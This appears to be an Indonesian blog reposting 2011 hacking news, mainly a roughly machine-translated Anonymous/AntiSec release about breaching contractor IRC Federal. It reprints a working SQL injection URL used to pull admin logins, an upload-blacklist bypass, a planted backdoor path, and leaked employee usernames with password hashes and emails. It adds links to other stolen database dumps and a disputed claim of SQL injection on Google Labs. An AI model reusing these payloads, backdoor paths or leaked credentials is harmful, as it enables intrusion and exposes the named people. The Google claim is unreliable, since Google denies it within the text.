Sabtu, 09 Juli 2011

Anonymous Hacks FBI Contractors IRC Federal

Anonymous Hacks FBI Contractors IRC Federal



Hacker anonim saat ini kebocoran beberapa file dari IRC federal melalui tweet. Mereka sudah mendapatkan akses ke kontrak, dokumen internal, skema pengembangan, login dan banyak lagi.  Download Link dirilis oleh Anonymous http://www.mediafire.com/?twxc1nhiluwr126 # 1, 106,91 MB.  juga tersedia sekarang Torrent.
Anonymous Said "Jika Anda menempatkan nilai apapun pada kebebasan, kemudian berhenti bekerja untuk kaum oligarki dan mulai bekerja melawan itu. Hentikan membantu perusahaan-perusahaan dan pemerintahan yang menggunakan cara tidak etis untuk sudut sejumlah besar kekayaan dan lanjutkan untuk terang-terangan menyalahgunakan kekuasaan mereka. Bersama, kita memiliki kekuatan untuk mengubah dunia ini menjadi lebih baik.".

Release lengkap pada Pastebin seperti yang ditunjukkan di bawah ini:

                             ```  : h0 yyyh     `                               
                          :0yyhhh   0  0  :   hhy00:  `                         
                    : 0hhh               ::     : y 0y   0000 :`               
             `: 000hh         :  `                :  0hh  : 00yy  :`           
              hh0:                    `  :                    :h00hh0:         
        ``  y   :                                      :        :    hh0 `     
        h0  :      :  `              `        :              : 0   : : hyy:`   
    ` h0                       :            `   0:                   `  : hh   
 ` 0h0:     :      :    : 0h0 0hh000  0 : 0 :::0                     ::  :: y `
`hh:   :  :        : :      :   ::     :        0      :   ::     h 0h:      yh
 y                 :                             ::        ::     :         0 h0
 h         :  : 00 :          :::     ::::         :                      : 0 y0
yh       : 0     :  ::        ::0h      0    00y        :     :        :    hy 
 y   00 :::      :: :   : :      y :   :     hy      :     :::           yyh ` 
  hyhyy : : :         ::         hh   :    :0yh   :::            :::: hyh:`     
   :    0   :::: : ::     ::     :y0:: :   :h0:  : ::::  hyy0 0h00hhyh          
          000   000yy ::      :::  y  :     hyh0hhh0hh0 :     0hyh :`           
                  `    0hhhhhyh00hhh: :    h     :`                             
                        ````       :      00                                    
                                    0 : : h:                                    
                                    0::   h                                     
                                  ` 0  :  h   `                                 
                        ` :   :     h:   :0          `                          
                        yh : : :  ::0     0:      : : 0 `                       
                        `  h 00 :: :::: :: :   :    0hyh                        
                             `:     yhh0hyh0 0  hhh0 `                          
                                    0   :h                                      
                                   `h::  0                                      
                                   `0::::h                                      
                                 `  0: ::y:`                                    
                                 hhy0: ::yyhy0                                  
                           ` ` 0 0yh    :hh0  y: ` ``                           
                         ::0  000  :  :  0hy   hyhhyyh `                        
                    `:  0 0  0: : :   :    h0:  :::  0hh                        
            :: `  : 0h: ::::   ::  00     : 00 0     : ::: 0hh    :  :`         
         `  h  0  ::::   :          : ::   : ::::         :: : 00hh 0 hh    


################################################################################
### #ANTISEC LAYING NUCLEAR WASTE TO MILITARY AND WHITE HAT BOXES SINCE 2011 ###
# FOR OFFICIAL UNDERGROUND USE ONLY # FUCK LOIC & LOIC-KIDS # FUCK BARRETBROWN #
################################################################################
          _  _                   __   __      
       __| || |__ _____    _____/  |_|__| ______ ____   ____           
       \   __   / \__  \  /    \   __\  |/  ___// __ \_/ ___\    #anonymous
        |  ||  |   / __ \|   |  \  | |  |\___ \\  ___/\  \___    #whiteh8
       /_  ~~  _\ (____  /___|  /__| |__/____  \\___ \ \___  |   #antisec
         |_||_|        \/     \/             \/     \/     \/    


################################################################################     
                       roses are red, violets are blue,
                      we hate whitehats, and you do too!
################################################################################


Hari ini kita melepaskan ownage pemerintah lagi-kontrak perusahaan IT, IRC
Federal. Mereka membual tentang multi-juta dolar kemitraan mereka dengan FBI,
Angkatan Darat, Angkatan Laut, NASA, dan Departemen Kehakiman, menjual mereka "keterampilan" untuk
AS kekaisaran. Jadi kita meletakkan limbah nuklir ke sistem mereka, memiliki menyedihkan mereka
kotak jendela, menjatuhkan database mereka dan email pribadi, dan dirusak mereka
profesional mencari situs web.


Dalam email mereka kami menemukan berbagai kontrak, skema pengembangan, dan internal
dokumen untuk berbagai instansi pemerintah termasuk usulan untuk FBI
untuk mengembangkan "Khusus Identitas Modernisasi (SIM) Proyek" untuk "mengurangi
teroris dan kegiatan kriminal dengan melindungi semua catatan yang berhubungan dengan
terpercaya individu dan mengungkapkan identitas dari orang-orang yang mungkin
menimbulkan risiko serius bagi Amerika Serikat dan sekutunya ". Kami juga menemukan
fingerprinting kontrak untuk pengembangan, DOJ biometrik untuk militer,
dan strategi kontrak untuk Administrasi Keamanan "Nuklir Nasional
Senjata Nuklir Kompleks ".



Selain itu kami menemukan informasi login ke VPN dan Departemen berbagai beberapa
Energi panel akses login bahwa kita sedang membuang * hidup * lengkap dengan beberapa URL
hidup file browser ASP dan meng-upload backdoors - mari kita lihat berapa lama waktu yang dibutuhkan untuk
mereka untuk menghapusnya (jangan khawatir kita akan terus meletakkan kembali sampai mereka menarik
kotak; D)


Sebelum kita mulai drop, pesan pribadi kepada karyawan dari IRC Federal

Jika Anda menempatkan nilai apapun pada kebebasan, kemudian berhenti bekerja untuk oligarki
dan mulai bekerja melawan itu. Hentikan membantu perusahaan-perusahaan dan pemerintah
yang menggunakan cara tidak etis untuk sudut sejumlah besar kekayaan dan melanjutkan
untuk terang-terangan menyalahgunakan kekuasaan mereka. Bersama, kita memiliki kekuatan untuk mengubah
dunia ini lebih baik.



Props to our black hat and antisec comrades: bantown, dikline,
h0no, phrack high council, ~el8 and all you kick-ass motherfuckers
we've never even heard of. Thank you.




################################################################################
## own & rm # own & rm # own & rm # own & rm # own & rm # own & rm # own & rm ##
################################################################################


Ello ej33t hax0urz! Kami memutuskan untuk melempar dalam sedikit bonus bagi anda yang
tinggal sebagai orang asing melalui dokumen ini membosankan-ass untuk memberikan sedikit rasa (dan
mudah-mudahan beberapa ide) tentang bagaimana hal ini turun!.


Sebelum Anda Adrian Lamo-jenis el33t (lololol!) Hacker mendapatkan tongkat Anda
keledai, hanya menyimpan doc sebelumnya dalam pikiran dan ingat: bahkan jika semua yang dapat Anda lakukan
adalah sql injeksi, Anda masih ~ 300% lebih berbakat dari nenek paling!
h0h00h0h0! (srsly tho)



http://www.ircfederal.com/news_display.asp?ID=-1%20union%20select%201,username,
mynumber,1%20FROM%20logins%20WHERE%20username%20%3C%3E%20%27bhunt%27


# admin login!


Setelah kami memiliki login admin, ada script untuk upload gambar. mereka
ekstensi blacklist (catatan untuk diri sendiri: daftar putih akan lebih tepat
di sini!), yang dilarang antara lain ASP. Apa yang mereka tidak memeriksa itu. Cfm


Ada beberapa orang lain juga. Ada database phpbb internal yang kita
download dan retak dan mendapat beberapa password email.


Jadi sekarang Anda tahu! Melindungi Anda dan keepz sialan itu realz!


################################################################################
## own & rm # own & rm # own & rm # own & rm # own & rm # own & rm # own & rm ##
################################################################################


file browse:
file upload: http://ircfederal.com/data/x.asp


Directory of C:\


07/04/2011  11:20 PM    <DIR>          .
07/04/2011  11:20 PM    <DIR>          ..
07/04/2011  08:00 PM    <DIR>          Backup
07/04/2011  08:00 PM    <DIR>          CAConfig
07/04/2011  08:00 PM    <DIR>          CFUSION
07/04/2011  08:00 PM    <DIR>          Documents and Settings
07/04/2011  08:00 PM    <DIR>          IIS-Aid
07/04/2011  08:00 PM    <DIR>          Inetpub
07/04/2011  08:00 PM    <DIR>          IOGA_2010
07/04/2011  08:00 PM    <DIR>          old sites moved to air
07/04/2011  08:00 PM    <DIR>          PHP
07/04/2011  08:00 PM    <DIR>          Program Files
07/04/2011  08:00 PM    <DIR>          Projects
07/04/2011  08:00 PM    <DIR>          RECYCLER
07/04/2011  08:00 PM    <DIR>          System Volume Information
07/04/2011  08:00 PM    <DIR>          usr
07/04/2011  08:00 PM    <DIR>          vbroker
07/04/2011  08:00 PM    <DIR>          VxPushRA
07/04/2011  08:00 PM    <DIR>          webdatabases
07/04/2011  08:00 PM    <DIR>          WebSites
07/04/2011  08:00 PM    <DIR>          WINNT
07/04/2011  08:00 PM    <DIR>          WUTemp




Directory of downloads/


07/02/2011  02:41 AM    <DIR>          .
07/02/2011  02:41 AM    <DIR>          ..
07/02/2011  02:56 AM    <DIR>          webdatabases
07/02/2011  03:12 AM           614,400 inventory.mdb
07/02/2011  03:21 AM        10,358,784 irc_site.mdb
07/02/2011  04:24 AM         1,396,224 IRC-VPN.doc
07/02/2011  03:25 AM           675,840 jubileewv.mdb
07/02/2011  03:26 AM           675,840 landmark.mdb
07/02/2011  03:26 AM           671,744 lccc.mdb
07/02/2011  03:31 AM         8,257,536 LWV.mdb
07/02/2011  03:43 AM         3,813,376 MantechLPM.mdb
07/02/2011  03:48 AM        11,272,192 MorgantownWeb.mdb
07/02/2011  03:50 AM         5,109,448 mpc_data.mdb
07/02/2011  03:51 AM         1,662,976 new_irc.mdb
07/02/2011  03:28 AM         7,020,544 newclass.mdb
07/02/2011  03:55 AM           638,976 SJMH.mdb
07/02/2011  03:45 AM           974,848 student.mdb
07/02/2011  03:44 AM           466,944 student2.mdb
07/02/2011  03:56 AM           106,496 survey.mdb
07/02/2011  03:57 AM           774,144 teachers.mdb
07/02/2011  04:00 AM           856,064 truly.mdb
07/02/2011  04:02 AM           151,552 Vaees.mdb
07/02/2011  04:02 AM         1,138,688 victory_cat.mdb
07/02/2011  04:03 AM           122,880 WeeklyActivityReport.mdb
07/02/2011  04:03 AM                64 weston.ldb
07/02/2011  04:04 AM         3,960,832 weston.mdb
07/02/2011  04:04 AM         3,960,832 weston1.mdb
07/02/2011  04:05 AM         3,960,832 weston2.mdb
07/02/2011  04:06 AM         1,883,668 wmdgear.mdb
07/02/2011  04:09 AM         1,134,592 wvantiquemarket.mdb
07/02/2011  04:18 AM           765,952 WVEDC_Members.mdb
07/02/2011  04:19 AM           966,656 wvstore.mdb
07/02/2011  04:18 AM           319,488 electric.mdb
07/04/2011  06:11 PM         1,073,152 enterprise_modeling.mdb
07/02/2011  04:03 AM           405,504 feedback.mdb
07/02/2011  04:02 AM           327,680 house.mdb
07/02/2011  03:23 AM           790,528 industrial.mdb
              34 File(s)     76,309,276 bytes




Directory of downloads/webdatabases


07/02/2011  02:56 AM    <DIR>          .
07/02/2011  02:56 AM    <DIR>          ..
07/02/2011  02:54 AM        14,290,944 allee_catalog.mdb
07/02/2011  02:55 AM           155,648 bea-log.mdb
07/02/2011  02:55 AM           811,008 catherine_miller.mdb
07/02/2011  02:55 AM           167,936 cityofweston.mdb
07/02/2011  02:08 AM         9,437,184 ircfederal.mdb
07/02/2011  02:53 AM         2,084,864 adoptafriend.mdb
07/02/2011  02:56 AM               300 WS_FTP.LOG
07/02/2011  02:57 AM         2,166,784 fghi.mdb
07/02/2011  02:58 AM    <DIR>          intranet
07/02/2011  03:12 AM           614,400 inventory.mdb
               9 File(s)     29,729,068 bytes


Directory of downloads/webdatabases/intranet


07/02/2011  02:58 AM    <DIR>          .
07/02/2011  02:58 AM    <DIR>          ..
07/02/2011  03:04 AM         1,044,480 Intranet_Forum.mdb
07/02/2011  02:58 AM                69 intra.7z
07/02/2011  03:04 AM                 0 intra.mdb
07/02/2011  03:04 AM         1,155,892 Intra.zip
07/02/2011  03:06 AM        11,272,192 intra_4-17.mdb
07/02/2011  03:11 AM        18,403,328 test_intra.mdb
07/04/2011  08:00 PM                64 Intranet_Forum.ldb
               7 File(s)     31,876,025 bytes




################################################################################
                            ==== Intranet_Forum.mdb ====
################################################################################
Terima kasih untuk menginstal bagian yang paling tidak aman dari forum kotoran di Bumi
di intranet anda - phpbb <3


sjohnson:2dfe5eec4b54cec609cf709b824630e5:sjohnson@ircwv.com
bhunt:17c47e3d330a684adb207c25190fdd01:bhunt@ircwv.com
kbelt:7fc35b06d610ee50bcb2e4c0751e8bdd:kbelt@ircwv.com
lmick:1abae2c527b80ebae05cd93670639707:lmick@ircwv.com
strefz:c5333176e2e62d40b29b520e30b753e1:strefz@ircwv.com
tuldrich:6845f32f1a73b387ab81924211db9835:tuldrich@ircwv.com
jmoore:3c5403d0df84733d1dc0323ca6e36325:jmoore@ircwv.com
bwentz:792be28a852fab3f6fb673dccf8dde98:bwentz@ircwv.com
ebrown:5e1adbeb0be073ebe835683880efb9cf:ebrown@ircwv.com
bwilliams:06a5fcae55d72a3cc92a27bc4cd5475e:bwilliams@ircwv.com
bgolden:35c08970ea65272a32d3a2eee3d382ed:bgolden@ircwv.com
srobertson:3b8acbb030bb9051da253731bae6ae12:srobertson@ircwv.com
sguinn:d6919e90f8e55fc227248be2d7d74182:sguinn@ircwv.com
jturner:58d3e64b4842c724bdb768be4ab8a90c:jturner@ircwv.com
smealey:3fbc778e075349ffac5e37b81031878a:smealey@ircwv.com
alane:a0b0ddd608e3e812470a57952195a43d:alane@ircwv.com
jsmith:1831ee85c424301c1d971e1f528db528:jsmith@critical1.com
swhite:dfbaf054abb3457b2447c1aca9acb4dd:Steven.White@ircwv.com
gstine:105ae5fb0f09f6af2c2c9cb735dc24e5:gstine@ircwv.com


Dari 6 yang crack dalam waktu yang wajar, dua sebenarnya
dua kali lipat sebagai email mereka. Benar-benar orang-orang?


Directory of ircf/bhunt


07/04/2011  05:34 PM    <DIR>          .
07/04/2011  05:34 PM    <DIR>          ..
07/04/2011  05:25 PM           258,048 144978-SOL-001-003_Draft-Bob-07-01-11.xls
07/04/2011  05:27 PM            39,805 Contractor Job Listings-WV_updated as of
063011.xlsx
07/04/2011  05:27 PM            15,348 Jun 2011 work Schedule.xlsx
07/04/2011  05:24 PM            17,353 M 3_MS_COMPLIANCE_MATRIX rev bgd.docx
07/04/2011  05:30 PM           286,124 msg0033.wav
07/04/2011  05:28 PM           363,884 msg0041.wav
07/04/2011  05:28 PM           381,164 msg0042.wav
07/04/2011  05:21 PM         2,040,373 Scanned from the Weston Xerox001(1).pdf
07/04/2011  05:21 PM           416,658 Scanned from the Weston Xerox001(2).pdf
07/04/2011  05:22 PM         2,081,373 Scanned from the Weston Xerox001(3).pdf
07/04/2011  05:22 PM           156,031 Scanned from the Weston Xerox001(4).pdf
07/04/2011  05:23 PM           147,533 Scanned from the Weston Xerox001(5).pdf
07/04/2011  05:20 PM         2,089,268 Scanned from the Weston Xerox001.pdf
07/04/2011  05:25 PM           176,640 SWAT_Cost_Volume_Draft_Bob-07-01-11.doc
07/04/2011  05:25 PM         1,219,706
SWAT_Volume_II_Mission_Suitability_Volume_Final_BH -  bgd rev.docx
              15 File(s)      9,689,308 bytes

Jumat, 01 Juli 2011

Database Meggit Hacked - Militer AS dan Penegakan Hukum pemasok peralatan untuk # Antisec




Database www.meggitttrainingsystems.com sebuah Militer AS dan Penegakan Hukum pemasok peralatan telah di hacked dan terpapar oleh Anonymous (Kru Bash).


Hacker mengatakan "Orang-orang dari Amerika Serikat ,pemerintah Anda menempatkan ada kepercayaan dan uang Anda ke orang-orang ini dan kami masuk ke database menggunakan dork google dan cara injection.semua dan kita berharap ini akan menyebabkan banyak  spamming dari korps  dan pemerintah akan memilih seperti situs kurang aman. "


vUNL link : http://www.meggitttrainingsystems.com/main.php?id=119

Hacker Rilis database Pastebin: http://pastebin.com/0r4A9DVR

If you enjoyed The Hacker News, Make sure you subscribe to our RSS feed. Stay Updated about latest Security threats, Hacking threads & IT Issues from all over the world.!

SQL Injection Kerentanan dalam Database System Lab Google




Kerentanan Sangat Besar & Kritis terdeteksi di Lab Sistem Google. Vendor sudah dilaporkan oleh hacker, Tapi mereka tidak mengambil langkah positif dalam hal ini, sehingga akhirnya terkena hacker kerentanan di depan umum oleh Bangladesh Cyber ​​Army Admin - Shadman Tanjim di Forum mereka.

Google Website Lab telah Kerentanan SQL Injection dan hal Berbahaya adalah Kerentanan ini dieksploitasi. Hacker bisa mendapatkan Tabel, kolom dan data dari Database. Google Lab Database memiliki sendiri menyesuaikan sistem DB. Tapi hal-hal menarik adalah sistem database mereka Similar sebagai database Ms Access. Dalam hal ini Ms Access adalah SQL Injection Sistem Juga Bekerja pada sistem database Google Lab.

 
Pernyataan Hacker:


I already contact with Google Corporation but they don’t give positive response, I think this is their big fault, and will suffer for that. But if they give Positive response then this will be very good for them. Thanks a Ton!!!
Shadman Tanjim
Ethical Hacker, Programmer and Security Professional
Email: admin@bdcyberarmy.com or shadman2600@gmail.com
Website: www.bdcyberarmy.com/forum
Greets to: Shahee Mirza, Almas Zaman, Sayem Islam, Pudina pata, LuckyFm and All
Bangladesh Cyber Army Members.
Saya sudah kontak dengan Google Korporasi tetapi mereka tidak memberikan respon positif, saya pikir ini adalah kesalahan besar mereka, dan akan menderita untuk itu. Tetapi jika mereka memberikan respon positif maka ini akan sangat baik bagi mereka. Thanks a Ton!
Shadman Tanjim
Etika Hacker, Programmer dan Keamanan Profesional
Email: admin@bdcyberarmy.com atau shadman2600@gmail.com
Website: www.bdcyberarmy.com / forum
Salam untuk: Shahee Mirza, Almas Zaman, Sayem Islam, Pudina pata, LuckyFm dan Semua
Bangladesh Cyber ​​
Anggota. Angkatan Darat

Video Download link:
http://www.bdcyberarmy.com/Google/google_video.avi

Hacker Rilis Langkah demi langkah tentang Kerentanan bukti ini
1. Website : www.googlelabs.com or labs.google.com

2. Vulnerability type : SQL Injection
3. Vulnerable url : http://www.googlelabs.com/?q=%27&apps=Search+Labs
4. Info:
Host IP: 209.85.175.141
Web Server: Google Frontend
Keyword Found: Fast
Injection type is Integer

Mari Periksa Pemanfaatan Rentan link ini. Berikut Hacker menggunakan 3 alat Terkenal SQL Injection. Mereka adalah:
1. Havij Advance SQL Injection Tool
2. Safe3 SQL Injector v8.4
3. Pangolin SQL Injection Tool

1 . Bekerja dengan Havij Alat SQL Injection Advance:
Screen Shot 1: Link memindai Rentan dan mengatakan situs ini adalah Rentan.

Screen Shot 2: Sekarang scan dan mendapatkan semua tabel dan kolom

Screen Shot 3: Sekarang Anda dapat melihat daftar tabel dan Kolom

Dan ini adalah Buktikan untuk Situs ini adalah SQL Injection Rentan Asli. Disini anda melihat jenis database MS Access, jadi ini adalah Bukti dari konsep ini. Beberapa orang harus Katakanlah Google Lab Sistem Database tidak Ms Access tapi ini database Website Similar sebagai database Ms Access dan Ms Access Query SQL Injection juga Bekerja pada sistem database Google Labs. Sebagai seperti MySQL 5 dan MySQL 4.1 keduanya disuntikkan melalui Uni pilih, tetapi keduanya tidak memiliki Skema Informasi.
 
2 .sekarang Bekerja dengan SQL Injector Safe3 v8.4:
Screen Shot 1: Menganalisis hubungan Rentan dan mengatakan itu rentan dan mendapatkan kata kunci dan jenis db.

Screen Shot 2: Sekarang Suntikkan link rentan dan mendapat Semua daftar Tabel dan daftar kolom

Ini adalah satu lagi Buktikan untuk Kerentanan Website dan kita bisa melihat ini dan hal yang Berbahaya dieksploitasi nya. Sekarang kita cek terakhir kami SQL Injection alat untuk 100% Memuaskan.
 
3rd Pangolin SQL Injection Tool:
Screen Shot 1: Link memindai rentan dan yang mengatakan website ini rentan

Screen Shot 2: Sekarang menyuntikkan Website ini dan mendapatkan tabel dan kolom daftar

Screen Shot 3: Berikut ini adalah Daftar lengkap dari Tabel dan daftar Kolom

Sekarang saya pikir kita adalah 100% Tentu Google Lab SQL Injection Website Rentan.

UPDATE : 
Google bersikeras bahwa ada telah ada intrusi. Perusahaan ini mengklaim bahwa database GQL mereka tidak akan membiarkan serangan injeksi SQL. Selain itu, mereka mengatakan bahwa data yang muncul di screen shot, tidak ada di mana saja di toko-toko data mereka.